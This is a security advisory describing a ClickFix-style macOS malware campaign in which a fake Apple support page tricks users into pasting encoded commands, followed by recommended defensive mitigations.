ClickFix Mac Malware Campaign Uses Fake Apple Page to Deliver Payloads

Executive Summary

Security researchers at Jamf have discovered a new social engineering campaign leveraging a ClickFix-style attack to deliver malware to macOS users. The scheme involves a deceptive web page mimicking Apple's branding, prompting victims to execute malicious shell commands under the guise of reclaiming disk space.

Technical Analysis

The malicious website presents itself as an official Apple support resource. It instructs users to open Script Editor and paste a series of encoded commands. These commands, once executed, download and install malware onto the victim’s system. According to Jamf's analysis, the script decodes a hidden payload from base64-encoded data embedded within the initial command sequence. This method avoids direct file downloads that might trigger traditional antivirus detection mechanisms.

Jamf noted that the final payload behavior remains under investigation but exhibits persistence mechanisms typical of post-exploitation frameworks. Specific artifacts such as launch agents or hidden directories are created to maintain access across reboots.

Tactics, Techniques & Procedures

The primary tactic used in this campaign is social engineering, specifically exploiting user trust in Apple-branded interfaces. Key techniques include:

• Deceptive Web Content: A convincing replica of Apple’s UI prompts users to perform actions they believe are safe.
• Living-off-the-Land Binaries (LOLBins): Use of built-in macOS tools like /bin/bash, base64, and curl to decode and execute payloads without raising suspicion.
• User Execution (T1204): Reliance on manual execution of scripts by end-users rather than exploiting software flaws.

Threat Actor Context

No specific threat actor has been attributed to this activity. However, the simplicity and broad targeting suggest it may be the work of financially motivated groups or script kiddies using publicly available phishing templates. Attribution remains speculative pending further forensic evidence.

Mitigations & Recommendations

Organizations should implement layered defenses to mitigate risks posed by ClickFix-style attacks:

• User Awareness Training: Educate staff about risks of copying and pasting untrusted code into terminal applications or scripting environments.
• Application Allow Lists: Restrict execution of scripting utilities such as Script Editor unless explicitly required.
• Endpoint Monitoring: Deploy behavioral analytics capable of detecting anomalous use of native OS binaries commonly abused in living-off-the-land scenarios.
• Browser Protections: Utilize DNS filtering and URL reputation services to block known malicious domains.

Administrators may also consider disabling automated execution permissions for downloaded files via extended attributes or Gatekeeper configurations.